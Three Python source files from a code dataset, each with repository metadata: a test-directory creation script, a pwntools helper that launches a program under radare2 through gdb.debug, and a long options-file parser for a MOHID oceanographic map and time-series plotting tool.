4a18950feb0906748d9b4bcbf52153c572f6c01f
| 130
|
py
|
Python
|
test/py/largrid-tests.py
|
cvdlab/lar-cc
|
7092965acf7c0c78a5fab4348cf2c2aa01c4b130
|
[
"MIT",
"Unlicense"
] | 1
|
2016-09-20T04:48:12.000Z
|
2016-09-20T04:48:12.000Z
|
test/py/largrid-tests.py
|
Ahdhn/lar-cc
|
7092965acf7c0c78a5fab4348cf2c2aa01c4b130
|
[
"MIT",
"Unlicense"
] | 1
|
2018-02-20T21:57:07.000Z
|
2018-02-21T07:18:11.000Z
|
test/py/largrid-tests.py
|
Ahdhn/lar-cc
|
7092965acf7c0c78a5fab4348cf2c2aa01c4b130
|
[
"MIT",
"Unlicense"
] | 7
|
2016-11-04T10:47:42.000Z
|
2018-04-10T17:32:50.000Z
|
import os
def createDir(dirpath):
if not os.path.exists(dirpath):
os.makedirs(dirpath)
createDir('test/py/largrid/')
| 18.571429
| 35
| 0.692308
|
4a18958d76f5163a2f72010050914318d882acb0
| 360
|
py
|
Python
|
r2dbg/__init__.py
|
Enigmatrix/pwntools-dbg-r2
|
042cfb34c1e6eeacf130052722cd95b8c68280de
|
[
"MIT"
] | 2
|
2020-03-05T23:41:47.000Z
|
2020-04-16T09:31:25.000Z
|
r2dbg/__init__.py
|
Enigmatrix/pwntools-dbg-r2
|
042cfb34c1e6eeacf130052722cd95b8c68280de
|
[
"MIT"
] | null | null | null |
r2dbg/__init__.py
|
Enigmatrix/pwntools-dbg-r2
|
042cfb34c1e6eeacf130052722cd95b8c68280de
|
[
"MIT"
] | 1
|
2020-04-16T09:31:38.000Z
|
2020-04-16T09:31:38.000Z
|
from pwn import *
def r2dbg(args, r2script=None, r2port=None, exe=None, ssh=None, env=None, sysroot=None, **kwargs):
gdbscript = ""
if r2port:
gdbscript += "#>port="+str(r2port)+"\n"
if r2script:
gdbscript += '\n'.join("#r2"+c for c in r2script.split('\n'))
return gdb.debug(args, gdbscript, exe, ssh, env, sysroot, **kwargs)
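# --- Hedged usage sketch ---
# Example invocation, assuming a local binary ./vuln; the r2 commands and the
# port are illustrative placeholders:
#
# p = r2dbg(['./vuln'], r2script='db main\ndc', r2port=9999)
# p.sendline(b'payload')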
| 32.727273
| 98
| 0.613889
|
4a1895b2973511754fbe196c48a63cc18fa48a84
| 45,310
|
py
|
Python
|
MapasDeCampos_by_hidromod/src/ModuloGeneralReadOptions.py
|
RBCanelas/MOHID_python_tools
|
debddbba4fed0e1eae042eedc1554094bb78a63d
|
[
"MIT"
] | null | null | null |
MapasDeCampos_by_hidromod/src/ModuloGeneralReadOptions.py
|
RBCanelas/MOHID_python_tools
|
debddbba4fed0e1eae042eedc1554094bb78a63d
|
[
"MIT"
] | null | null | null |
MapasDeCampos_by_hidromod/src/ModuloGeneralReadOptions.py
|
RBCanelas/MOHID_python_tools
|
debddbba4fed0e1eae042eedc1554094bb78a63d
|
[
"MIT"
] | null | null | null |
import logging
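# Hedged sketch of the options-file format this class parses (keywords taken
# from the handlers below; the paths and values are illustrative only):
#
# PLOT_IMAGE_TYPE : maps
# FILE_PATH : /path/to/results.hdf5
# SCALAR : temperature
# WINDOW : -9.5 38.4 -8.9 38.9
# <BEGIN_FILES_LIST>
# /path/to/timeseries1.dat
# <END_FILES_LIST>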
class readOptions(object):
# The class "constructor" - It's actually an initializer
def __init__(self, filename):
# General
self.plot_image_type = 'maps'
self.plot_type = 1
self.title = ''
self.CompressImage = None
self.Xmin = None
self.Ymin = None
self.Xmax = None
self.Ymax = None
self.fontsize = 6
self.logopath = None
self.dpi = 200
self.figureOutName = None
self.AQUASAFE = 0
#MAPS
self.filePath = None
self.filePathB = None
self.scalar = None
self.scalarMax = None
self.scalarMin = None
self.layerDepth = 'surface'
self.vectorX = None
self.vectorY = None
self.stream = 0
self.streamX = None
self.streamY = None
self.stream_arrow_factor = 5
self.stream_color = None
self.stream_density = 0.5
self.stream_linewidth= 1.5
self.vectorStep = 1
self.vectorSize = None
self.vectorWidth = 0.002
self.legend = None
self.gssh = 0
self.worldImage = 0
self.worldImage_esri= 'World_Imagery'
self.colorbar = 1
self.colormap = 'jet'
self.colorbarSpacing= 1
self.timeZone = 'UTC'
self.dt = 1
self.filename = filename
self.fillValue = None
self.fillContinents = 0
self.fillContinents_color = 'w'
self.window = None
self.dx = None
self.dy = None
self.resolution = 'i'
self.coastline = 0
self.X = 0
self.Y = 0
self.points = 0
self.label = 1
self.orientationcolorbar = 'vertical'
self.logoPath = None
self.decimalcolorbar = None
self.drawBathymetry = 0
self.extend = None
self.figuretransparent = 0
self.constantvector = 0
self.vectorcolor = 'k'
self.figurecolor = 'w'
self.xpixel = None
self.ypixel = None
self.figurequality = 100
self.quiverunits = 'width'
self.justvector = 0
self.polygon = 0
self.polygonfill = 0
self.polygoncolor = 'k'
self.pcolor = 0
self.LogMap = 0
self.conversionfactor = None
self.colorpoints = 'r'
self.fontsizepoints = 15
self.dynamic_limits = 0
self.hdf5valida_config = []
self.maps_validation_parameters = []
self.timeseries_validation_parameters = []
self.run_valida = 1
self.Xinches = None
self.Yinches = None
self.validation_grid = [1,1]
self.validation_grid_ws = 0.3
self.validation_grid_hs = 0.1
self.plot_bias = 0
self.plot_rmse = 0
self.plot_rcorr = 0
#TimeSeries
self.linewidth = 1
self.xlabel = None
self.ylabel = None
self.parameter = ''
self.Ymax = None
self.Ymin = None
self.files_list = []
self.files_list_column = []
self.files_list_name = []
self.files_list_type = []
self.files_list_color = []
self.offset = []
self.timeserieanalyser_config = []
self.executable_exe = None
self.stdev_obs =None
self.average_obs =None
self.bias =None
self.rmse =None
self.normalise_rmse =None
self.unbias_rmse =None
self.normalise_unbias_rmse =None
self.rcorr =None
self.nash_sutcliffe =None
self.skill =None
self.rcorr_quad =None
self.z_fisher =None
self.alfa =None
self.beta_1 =None
self.am =None
self.bm =None
self.basemap_config = None
readOptions.__scanOptions(self)
def __scanOptions(self):
import re
import os
import logging
import sys
try:
fid = open(self.filename, 'r',encoding='utf-8')
except IOError:
logging.info(': Modulo General Read Options : Error 001 : Cannot open ' + self.filename)
logging.shutdown()
sys.exit()
try:
for line in fid:
auxString=line
string=auxString.strip()
stringSplit=re.split(':',string,1)
if stringSplit[0].strip().lower() == 'PLOT_IMAGE_TYPE'.lower():
string=stringSplit[1].strip()
mylist=string.split(' ')
self.plot_image_type=(mylist[0])
elif stringSplit[0].strip().lower() == 'PLOT_TYPE'.lower():
string=stringSplit[1].strip()
mylist=string.split('#')
self.plot_type= int(mylist[0])
elif stringSplit[0].strip().lower() == 'FIGURE_OUT_NAME'.lower():
self.figureOutName=stringSplit[1].strip()
if not self.figureOutName:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'DPI'.lower():
self.dpi=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'LOGO_PATH'.lower():
self.logoPath=stringSplit[1].strip()
if not self.logoPath:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'FONTSIZE'.lower():
self.fontsize= float(stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'COMPRESSIMAGE'.lower():
self.CompressImage=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'TITLE'.lower():
self.title=stringSplit[1].strip()
if not self.title:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'FILE_PATH'.lower():
self.filePath=stringSplit[1].split(',')
if not self.filePath:
raise ValueError('Empty String!')
#if self.plot_image_type == 'maps' and self.plot_type == 2:
# self.filePathB=self.filePath[1].strip()
# self.filePath=self.filePath[0].strip()
#else:
self.filePath=self.filePath[0].strip()
elif stringSplit[0].strip().lower() == 'AQUASAFE'.lower():
self.AQUASAFE=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'SCALAR'.lower():
self.scalar=stringSplit[1].strip()
if not self.scalar:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'SCALAR_MAX'.lower():
self.scalarMax= float(stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'SCALAR_MIN'.lower():
self.scalarMin= float(stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'VECTOR_X'.lower():
self.vectorX=stringSplit[1].strip()
if not self.vectorX:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'VECTOR_Y'.lower():
self.vectorY=stringSplit[1].strip()
if not self.vectorY:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'STREAMPLOT'.lower():
self.stream=int (stringSplit[1].strip())
if not self.stream:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'STREAMPLOT_DENSITY'.lower():
self.stream_density=float (stringSplit[1].strip())
#if self.stream_density > 4:
#    raise ValueError('Reduce Stream Density, values must be below or equal to 4!') # if larger, it generates a matrix of 30*density
elif stringSplit[0].strip().lower() == 'STREAMPLOT_LINEWIDTH'.lower():
self.stream_linewidth=float (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'STREAMPLOT_ARROW_FACTOR'.lower():
self.stream_arrow_factor=float (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'STREAMPLOT_X'.lower():
self.streamX=stringSplit[1].strip()
if not self.streamX:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'STREAMPLOT_Y'.lower():
self.streamY=stringSplit[1].strip()
if not self.streamY:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'STREAMPLOT_COLOR'.lower():
self.stream_color = stringSplit[1].strip()
if self.stream_color.startswith("["):
aux = tuple(self.stream_color[1:int(len(self.stream_color))-1].split(','))
self.stream_color=float(aux[0]),float(aux[1]),float(aux[2])
elif stringSplit[0].strip().lower() == 'VECTOR_STEP'.lower():
self.vectorStep=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'VECTOR_SIZE'.lower():
self.vectorSize=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'VECTOR_WIDTH'.lower():
self.vectorWidth=float (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'LEGEND'.lower():
self.legend=stringSplit[1].strip()
if not self.legend:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'GSSH'.lower():
self.gssh=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'WORLD_IMAGE'.lower():
self.worldImage=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'WORLD_IMAGE_ESRI'.lower():
self.worldImage_esri=stringSplit[1].strip().split()[0]
if not self.worldImage_esri:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'COLORBAR'.lower():
self.colorbar=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'DYNAMIC_LIMITS'.lower():
self.dynamic_limits=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'COLORMAP'.lower():
stringcolormap = stringSplit[1].strip()
if stringcolormap.startswith("["):
auxColormap = stringcolormap[1:int(len(stringcolormap))-1].split(';')
self.colormap= [None]*(len(auxColormap));
i=0
for x in auxColormap:
temp=x.split(',')
self.colormap[i] = [float(temp[0]),float(temp[1]),float(temp[2])]
i=i+1
else:
self.colormap = stringSplit[1].strip()
elif stringSplit[0].strip().lower() == 'TIMEZONE'.lower():
self.timeZone=stringSplit[1].strip()
if not self.timeZone:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'DT'.lower():
self.dt=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'XINCHES'.lower():
self.Xinches=float (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'YINCHES'.lower():
self.Yinches=float (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'LAYER_DEPTH'.lower():
if not stringSplit[1].strip():
raise ValueError('Empty String!')
elif stringSplit[1].strip().lower() == 'SURFACE'.lower():
self.layerDepth=stringSplit[1].strip().lower()
else:
self.layerDepth=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'FILL_VALUE'.lower():
auxFields=re.split(r' +',stringSplit[1].strip())
self.fillValue=[float(i) for i in auxFields]
elif stringSplit[0].strip().lower() == 'COLORBAR_SPACING'.lower():
self.colorbarSpacing=float (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'FILL_CONTINENTS'.lower():
self.fillContinents=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'RUN_VALIDA'.lower():
self.run_valida=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'DX'.lower():
self.dx=float (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'DY'.lower():
self.dy=float (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'GSSH_RESOLUTION'.lower():
self.resolution=stringSplit[1].strip()
elif stringSplit[0].strip().lower() == 'WINDOW'.lower():
stringSplit=re.split(':',string,1)
self.Xmin=float (re.split(' ',stringSplit[1].strip(),0)[0])
self.Ymin=float (re.split(' ',stringSplit[1].strip(),0)[1])
self.Xmax=float (re.split(' ',stringSplit[1].strip(),0)[2])
self.Ymax=float (re.split(' ',stringSplit[1].strip(),0)[3])
elif stringSplit[0].strip().lower() == 'COASTLINE'.lower():
coastlineFile=stringSplit[1].strip()
if not coastlineFile:
raise ValueError('Coastline Empty String!')
try:
self.coastline = 1
fid = open(coastlineFile, 'r',encoding='utf-8')
self.X,self.Y = [], []
for line in fid:
self.X.append(float (re.split(' ',line.strip(),0)[0]))
self.Y.append(float (re.split(' ',line.strip(),0)[1]))
except ValueError as ex:
fid.close()
logging.info(': Modulo General Read Options : Error 002 : No Coastline Path ' + stringSplit[0].strip().lower())
logging.shutdown()
sys.exit()
elif stringSplit[0].strip().lower() == 'POINTS'.lower():
pointsFile=stringSplit[1].strip()
if not pointsFile:
raise ValueError('Points Empty String!')
try:
self.points = 1
fid = open(pointsFile, 'r',encoding='utf-8')
self.NamePoints,self.XPoints,self.YPoints = [], [], []
for line in fid:
self.NamePoints.append(re.split(' ',line.strip(),0)[0])
self.XPoints.append(float (re.split(' ',line.strip(),0)[1]))
self.YPoints.append(float (re.split(' ',line.strip(),0)[2]))
except ValueError as ex:
fid.close()
logging.info(': Modulo General Read Options : Error 003 : No Points Path ' + stringSplit[0].strip().lower())
logging.shutdown()
sys.exit()
elif stringSplit[0].strip().lower() == 'LABEL'.lower():
self.label=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'ORIENTATIONCOLORBAR'.lower():
self.orientationcolorbar=stringSplit[1].strip()
if not self.orientationcolorbar:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'JUST_VECTOR'.lower():
self.justvector= int(stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'DECIMALCOLORBAR'.lower():
self.decimalcolorbar=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'DRAW_BATHYMETRY'.lower():
self.drawBathymetry=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'EXTEND'.lower():
self.extend =stringSplit[1].strip()
elif stringSplit[0].strip().lower() == 'FIGURE_TRANSPARENT'.lower():
self.figuretransparent =int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'CONSTANT_VECTOR'.lower():
self.constantvector =int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'VECTOR_COLOR'.lower():
self.vectorcolor = stringSplit[1].strip()
if self.vectorcolor.startswith("["):
aux = tuple(self.vectorcolor[1:int(len(self.vectorcolor))-1].split(','))
self.vectorcolor=float(aux[0]),float(aux[1]),float(aux[2])
elif stringSplit[0].strip().lower() == 'FIGURE_COLOR'.lower():
self.figurecolor = stringSplit[1].strip()
if self.figurecolor.startswith("["):
aux = tuple(self.figurecolor[1:int(len(self.figurecolor))-1].split(','))
self.figurecolor=float(aux[0]),float(aux[1]),float(aux[2])
elif stringSplit[0].strip().lower() == 'FILL_CONTINENTE_COLOR'.lower():
self.fillContinents_color = stringSplit[1].strip()
if self.fillContinents_color.startswith("["):
aux = tuple(self.fillContinents_color[1:int(len(self.fillContinents_color))-1].split(','))
self.fillContinents_color=float(aux[0]),float(aux[1]),float(aux[2])
elif stringSplit[0].strip().lower() == 'X_PIXEL'.lower():
self.xpixel =int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'Y_PIXEL'.lower():
self.ypixel =int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'FIGURE_QUALITY'.lower():
self.figurequality =int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'QUIVER_UNITS'.lower():
self.quiverunits = (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'POLYGON_FILE'.lower():
polygonFile=stringSplit[1].strip()
if not polygonFile:
raise ValueError('Polygon file Empty String!')
try:
self.polygon = 1
fid = open(polygonFile, 'r',encoding='utf-8')
self.polyX,self.polyY = [], []
for line in fid:
self.polyX.append(float (re.split(' ',line.strip(),0)[0]))
self.polyY.append(float (re.split(' ',line.strip(),0)[1]))
except ValueError as ex:
fid.close()
logging.info(': Modulo General Read Options : Error 004 : No polygon file Path ' + stringSplit[0].strip().lower())
logging.shutdown()
sys.exit()
elif stringSplit[0].strip().lower() == 'POLYGON_COLOR'.lower():
self.polygoncolor = stringSplit[1].strip()
if self.polygoncolor.startswith("["):
aux = tuple(self.polygoncolor[1:int(len(self.polygoncolor))-1].split(','))
self.polygoncolor=float(aux[0]),float(aux[1]),float(aux[2])
elif stringSplit[0].strip().lower() == 'POLYGON_FILL'.lower():
self.polygonfill=int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'PCOLOR'.lower():
self.pcolor =int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'LOG_MAP'.lower():
self.LogMap =int (stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'LOG_MAP_LEVELS'.lower():
AuxLogMapLevels = stringSplit[1].strip().split(',')
self.LogMapLevels = [float(i) for i in AuxLogMapLevels]
elif stringSplit[0].strip().lower() == 'CONVERSION_FACTOR'.lower():
self.conversionfactor =float(stringSplit[1].strip())
elif stringSplit[0].strip().lower() == 'POINTS_COLOR'.lower():
self.colorpoints = stringSplit[1].strip()
if self.colorpoints.startswith("["):
aux = tuple(self.colorpoints[1:int(len(self.colorpoints))-1].split(','))
self.colorpoints=float(aux[0]),float(aux[1]),float(aux[2])
elif stringSplit[0].strip().lower() == 'FONTSIZE_POINTS'.lower():
self.fontsizepoints= float(stringSplit[1].strip())
elif stringSplit[0].strip().lower() == '<BEGIN_VALIDATION_PARAMETERS_MAPS>'.lower():
try:
for line in fid:
auxString=line
mylist=auxString.split(',')
if line.strip().lower() == '<END_VALIDATION_PARAMETERS_MAPS>'.lower():
break
else :
if int(mylist[1]) == 0:
continue
else:
self.maps_validation_parameters.append(mylist)
except:
logging.info(': Modulo General Read Options : Error 006 : failed to read validation maps request')
elif stringSplit[0].strip().lower() == '<BEGIN_VALIDATION_PARAMETERS_TS>'.lower():
try:
for line in fid:
auxString=line
mylist=auxString.split(',')
if line.strip().lower() == '<END_VALIDATION_PARAMETERS_TS>'.lower():
break
else :
if int(mylist[1]) == 0:
continue
else:
self.timeseries_validation_parameters.append(mylist)
except:
logging.info(': Modulo General Read Options : Error 007 : failed to read validation timeseries request')
elif stringSplit[0].strip().lower() == 'VALIDATION_GRID'.lower():
string=stringSplit[1].strip()
mylist=string.split(',')
_A= mylist[0]
_B= mylist[1]
self.validation_grid= [int(_A),int(_B)]
elif stringSplit[0].strip().lower() == 'PLOT_BIAS'.lower():
try:
string=stringSplit[1].strip()
mylist=string.split(',')
self.plot_bias = mylist
#self.plot_bias.ymin = int(mylist[1])
#self.plot_bias.ymax = int(mylist[2])
#self.plot_bias.eixo = int(mylist[3])
#self.plot_bias.title = mylist[4]
except ValueError as ex:
logging.info(': Modulo General Read Options : Error 008 : failed to process ' + stringSplit[0].strip().lower())
logging.shutdown()
sys.exit()
elif stringSplit[0].strip().lower() == 'PLOT_RMSE'.lower():
try:
string=stringSplit[1].strip()
mylist=string.split(',')
self.plot_rmse = mylist
#self.plot_bias.ymin = int(mylist[1])
#self.plot_bias.ymax = int(mylist[2])
#self.plot_bias.eixo = int(mylist[3])
#self.plot_bias.title = mylist[4]
except ValueError as ex:
logging.info(': Modulo General Read Options : Error 009 : failed to process ' + stringSplit[0].strip().lower())
logging.shutdown()
sys.exit()
elif stringSplit[0].strip().lower() == 'PLOT_RCORR'.lower():
try:
string=stringSplit[1].strip()
mylist=string.split(',')
self.plot_rcorr = mylist
#self.plot_bias.ymin = int(mylist[1])
#self.plot_bias.ymax = int(mylist[2])
#self.plot_bias.eixo = int(mylist[3])
#self.plot_bias.title = mylist[4]
except ValueError as ex:
logging.info(': Modulo General Read Options : Error 010 : failed to process ' + stringSplit[0].strip().lower())
logging.shutdown()
sys.exit()
elif stringSplit[0].strip().lower() == 'LINEWIDTH'.lower():
self.linewidth=stringSplit[1].strip()
if not self.linewidth:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'PARAMETER'.lower():
self.parameter=stringSplit[1].strip()
if not self.parameter:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'XLABEL'.lower():
self.xlabel=stringSplit[1].strip()
if not self.xlabel:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'YLABEL'.lower():
self.ylabel=stringSplit[1].strip()
if not self.ylabel:
raise ValueError('Empty String!')
elif stringSplit[0].strip().lower() == 'FIGURE_COLOR'.lower():
try:
self.figurecolor = stringSplit[1].strip()
if self.figurecolor.startswith("["):
aux = tuple(self.figurecolor[1:int(len(self.figurecolor))-1].split(','))
self.figurecolor=float(aux[0]),float(aux[1]),float(aux[2])
logging.info(': Success 001 : figure color read ')
except:
logging.info(': Modulo General Read Options : Error 011 : failed to read figure color ')
elif stringSplit[0].strip().lower() == 'YMAX'.lower():
try:
self.Ymax=float (stringSplit[1].strip())
logging.info(': Success 001 : Ymax read ')
except:
logging.info(': Modulo General Read Options : Error 012 : failed to read Ymax ')
elif stringSplit[0].strip().lower() == 'YMIN'.lower():
try:
self.Ymin=float (stringSplit[1].strip())
logging.info(': Success 001 : Ymin read ')
except:
logging.info(': Modulo General Read Options : Error 013 : failed to read Ymin ')
elif stringSplit[0].strip().lower() == 'X_PIXEL'.lower():
try:
self.xpixel =int (stringSplit[1].strip())
logging.info(': Success 001 : X dimension read ')
except:
logging.info(': Modulo General Read Options : Error 014 : failed to read X dimension ')
elif stringSplit[0].strip().lower() == 'Y_PIXEL'.lower():
try:
self.ypixel =int (stringSplit[1].strip())
logging.info(': Success 001 : Y dimension read ')
except:
logging.info(': Modulo General Read Options : Error 015 : failed to read Y dimension ')
elif stringSplit[0].strip().lower() == '<BEGIN_FILES_LIST>'.lower():
try:
for line in fid:
auxString=line
string=auxString.strip()
if line.strip().lower() == '<END_FILES_LIST>'.lower():
break
else :
auxValues=re.split(' +',string.strip())
self.files_list.append(string)
logging.info(': Success 001 : file list read ')
except:
logging.info(': Modulo General Read Options : Error 016 : failed to read file list ')
elif stringSplit[0].strip().lower() == '<BEGIN_FILES_LIST_COLUMN>'.lower():
try:
for line in fid:
auxString=line
string=auxString.strip()
if line.strip().lower() == '<END_FILES_LIST_COLUMN>'.lower():
break
else :
auxValues=re.split(' +',string.strip())
self.files_list_column.append(int(string))
logging.info(': Success 001 : file column list read ')
except:
logging.info(': Modulo General Read Options : Error 017 : failed to read file column list ')
elif stringSplit[0].strip().lower() == '<BEGIN_FILES_LIST_NAME>'.lower():
try:
for line in fid:
auxString=line
string=auxString.strip()
if line.strip().lower() == '<END_FILES_LIST_NAME>'.lower():
break
else :
auxValues=re.split(' +',string.strip())
self.files_list_name.append(string)
logging.info(': Success 001 : file name list read ')
except:
logging.info(': Modulo General Read Options : Error 018 : failed to read file name list ')
elif stringSplit[0].strip().lower() == '<BEGIN_FILES_OFFSET>'.lower():
try:
for line in fid:
auxString=line
string=auxString.strip()
if line.strip().lower() == '<END_FILES_OFFSET>'.lower():
break
else :
auxValues=re.split(' +',string.strip())
self.offset.append(float(string))
logging.info(': Success 001 : offset list read ')
except:
logging.info(': Modulo General Read Options : Error 019 : failed to read offset list ')
elif stringSplit[0].strip().lower() == '<BEGIN_TimeSeriesAnalyser>'.lower():
try:
for line in fid:
auxString = line
if line.strip().lower() == '<END_TimeSeriesAnalyser>'.lower():
break
else :
self.timeserieanalyser_config.append(auxString)
logging.info(': Success 001 : TimeSeriesAnalyser configuration read ')
except:
logging.info(': Modulo General Read Options : Error 020 : failed to read TimeSeriesAnalyser configuration ')
elif stringSplit[0].strip().lower() == '<BEGIN_hdf5nalyser>'.lower():
try:
for line in fid:
auxString = line
if line.strip().lower() == '<end_hdf5nalyser>'.lower():
break
else :
self.hdf5valida_config.append(auxString)
logging.info(': Success 001 : hdf5analyser configuration read ')
except:
logging.info(': Modulo General Read Options : Error 020 : failed to read hdf5analyser configuration ')
elif stringSplit[0].strip().lower() == '<BEGIN_FILES_COLOR>'.lower():
try:
for line in fid:
auxString=line
string=auxString.strip()
if line.strip().lower() == '<END_FILES_COLOR>'.lower():
break
else :
auxValues=re.split(' +',string.strip())
self.files_list_color.append(string)
logging.info(': Success 001 : time series color list read ')
except:
logging.info(': Modulo General Read Options : Error 000 : failed to read time series color list ')
elif stringSplit[0].strip().lower() == '<BEGIN_FILES_TYPE>'.lower():
try:
for line in fid:
auxString=line
string=auxString.strip()
if line.strip().lower() == '<END_FILES_TYPE>'.lower():
break
else :
auxValues=re.split(' +',string.strip())
self.files_list_type.append(string)
logging.info(': Success 001 : time series symbol type list read ')
except:
logging.info(': Modulo General Read Options : Error 018 : failed to read time series symbol type list ')
elif stringSplit[0].strip().lower() == 'EXECUTABLE_PATH'.lower():
try:
self.executable_exe=stringSplit[1].strip()
logging.info(': Success 001 : executable path found ')
if not self.executable_exe:
raise ValueError('Empty String!')
except:
logging.info(': Modulo General Read Options : Error 021 : executable path not found')
elif stringSplit[0].strip().lower() == 'STDEV_OBS'.lower():
try:
self.stdev_obs=float (stringSplit[1].strip())
logging.info(': Success 001 : display STDEV_OBS ')
except:
logging.info(': Modulo General Read Options : Error 022 : could not read the 0/1 option for STDEV_OBS ')
elif stringSplit[0].strip().lower() == 'AVERAGE_OBS'.lower():
try:
self.average_obs=float (stringSplit[1].strip())
logging.info(': Success 001 : display AVERAGE_OBS ')
except:
logging.info(': Modulo General Read Options : Error 023 : could not read the 0/1 option for AVERAGE_OBS ')
elif stringSplit[0].strip().lower() == 'BIAS'.lower():
try:
self.bias=float (stringSplit[1].strip())
logging.info(': Success 001 : display BIAS ')
except:
logging.info(': Modulo General Read Options : Error 024 : could not read the 0/1 option for BIAS ')
elif stringSplit[0].strip().lower() == 'RMSE'.lower():
try:
self.rmse=float (stringSplit[1].strip())
logging.info(': Success 001 : display RMSE ')
except:
logging.info(': Modulo General Read Options : Error 025 : could not read the 0/1 option for RMSE ')
elif stringSplit[0].strip().lower() == 'NORMALISE_RMSE'.lower():
try:
self.normalise_rmse=float (stringSplit[1].strip())
logging.info(': Success 001 : display Normalise RMSE [%] ')
except:
logging.info(': Modulo General Read Options : Error 026 : could not read the 0/1 option for Normalise RMSE [%] ')
elif stringSplit[0].strip().lower() == 'UNBIAS_RMSE'.lower():
try:
self.unbias_rmse=float (stringSplit[1].strip())
logging.info(': Success 001 : display Unbias RMSE ')
except:
logging.info(': Modulo General Read Options : Error 027 : could not read the 0/1 option for Unbias RMSE ')
elif stringSplit[0].strip().lower() == 'NORMALISE_UNBIAS_RMSE'.lower():
try:
self.normalise_unbias_rmse=float (stringSplit[1].strip())
logging.info(': Success 001 : display Normalise unbias RMSE[%] ')
except:
logging.info(': Modulo General Read Options : Error 028 : could not read the 0/1 option for Normalise unbias RMSE[%] ')
elif stringSplit[0].strip().lower() == 'RCORR'.lower():
try:
self.rcorr=float (stringSplit[1].strip())
logging.info(': Success 001 : display rcorr ')
except:
logging.info(': Modulo General Read Options : Error 029 : could not read the 0/1 option for rcorr ')
elif stringSplit[0].strip().lower() == 'NASH_SUTCLIFFE'.lower():
try:
self.nash_sutcliffe=float (stringSplit[1].strip())
logging.info(': Success 001 : display NASH-SUTCLIFFE ')
except:
logging.info(': Modulo General Read Options : Error 030 : could not read the 0/1 option for NASH-SUTCLIFFE ')
elif stringSplit[0].strip().lower() == 'SKILL'.lower():
try:
self.skill=float (stringSplit[1].strip())
logging.info(': Success 001 : display SKILL ')
except:
logging.info(': Modulo General Read Options : Error 031 : could not read the 0/1 option for SKILL ')
elif stringSplit[0].strip().lower() == 'RCORR_QUAD'.lower():
try:
self.rcorr_quad=float (stringSplit[1].strip())
logging.info(': Success 001 : display rcorr_quad ')
except:
logging.info(': Modulo General Read Options : Error 032 : could not read the 0/1 option for rcorr_quad ')
elif stringSplit[0].strip().lower() == 'Z_FISHER'.lower():
try:
self.z_fisher=float (stringSplit[1].strip())
logging.info(': Success 001 : display z_fisher ')
except:
logging.info(': Modulo General Read Options : Error 033 : could not read the 0/1 option for z_fisher ')
elif stringSplit[0].strip().lower() == 'ALFA'.lower():
try:
self.alfa=float (stringSplit[1].strip())
logging.info(': Success 001 : display alfa ')
except:
logging.info(': Modulo General Read Options : Error 034 : could not read the 0/1 option for alfa ')
elif stringSplit[0].strip().lower() == 'BETA_1'.lower():
try:
self.beta_1=float (stringSplit[1].strip())
logging.info(': Success 001 : display beta_1 ')
except:
logging.info(': Modulo General Read Options : Error 035 : could not read the 0/1 option for beta_1 ')
elif stringSplit[0].strip().lower() == 'AM'.lower():
try:
self.am=float (stringSplit[1].strip())
logging.info(': Success 001 : display Am ')
except:
logging.info(': Modulo General Read Options : Error 036 : could not read the 0/1 option for Am ')
elif stringSplit[0].strip().lower() == 'BM'.lower():
try:
self.bm=float (stringSplit[1].strip())
logging.info(': Success 001 : display Bm ')
except:
logging.info(': Modulo General Read Options : Error 037 : could not read the 0/1 option for Bm ')
